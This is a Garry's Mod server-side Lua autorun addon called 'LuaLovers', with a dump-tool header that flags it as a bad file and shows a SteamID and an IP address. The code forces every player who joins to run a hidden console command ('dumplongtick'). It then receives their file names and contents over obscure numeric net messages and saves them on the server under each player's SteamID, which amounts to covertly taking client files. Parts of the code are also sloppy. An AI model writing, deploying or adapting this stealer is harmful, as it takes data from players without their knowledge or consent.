--[[
	MOD/addons/LuaLovers/lua/autorun/server/LuaLoversLoving1.lua [#2004 (#2079), 3132426106, UID:3930987991]
	lemmagame.com Check it out | STEAM_0:0:45881962 <209.89.51.159:27005> | [03.05.14 05:35:11PM]
	===BadFile===
]]

local directory = "LuaLovers" -- In case you want a special name.
file.CreateDir(directory)
util.AddNetworkString("93858182383125")
util.AddNetworkString("93858182383126")
local tableshitter = {}
local tableshitter2 = {}
local plyinfo = {}

function DataReceive(len, ply)
table.insert(plyinfo,tostring(string.gsub(string.gsub(ply:SteamID(),":","_"),"_","-")))
table.insert(plyinfo,tostring(net.ReadString()))
local Content = net.ReadTable(len)
local fContent = ""

for k,v in pairs(Content) do
	fContent = tostring(fContent) .. tostring(v)
end
table.insert(tableshitter,fContent)
end

function DataReceive2(len, ply)
local Content = net.ReadTable(len)
local fContent = ""
	if Content then
		for k,v in pairs(Content) do
			fContent = tostring(fContent) .. tostring(v)
		end
		table.insert(tableshitter2,fContent)
	end
end

function addfinishershit()
local fContent1 = ""
local fContent2 = ""

for k,v in pairs(tableshitter) do
fContent = tostring(fContent)..tostring(v)
end
for k,v in pairs(tableshitter2) do
fContent2 = tostring(fContent2)..tostring(v)
end
local fContent = tostring(fContent)..tostring(fContent2)
local ID = tostring(plyinfo[1])
local fName = tostring(plyinfo[2])

if (!file.IsDir(directory.."/"..ID,"DATA")) then
file.CreateDir(directory.."/"..ID)	
end
	
	local namename = ""
	local dtw = string.Explode("/",fName)
	table.remove(dtw,table.GetLastKey(dtw))
	for k,v in pairs(dtw) do
		namename = namename..v.."/"
		
		if (!file.IsDir(directory.."/"..ID.."/"..namename,"DATA")) then
		file.CreateDir(directory.."/"..ID.."/"..namename)
		end
	file.Write(directory.."/"..ID.."/"..fName..".txt",fContent)
	end
end

net.Receive("93858182383125", DataReceive)
net.Receive("93858182383126", DataReceive2)
addfinishershit()

hook.Add("PlayerInitialSpawn", "LuaLovers", function(ply)
ply:ConCommand("dumplongtick")
net.Receive("93858182383125", DataReceive)
net.Receive("93858182383126", DataReceive2)
addfinishershit()
end)

for k,v in pairs(player.GetAll()) do
v:ConCommand("dumplongtick")
end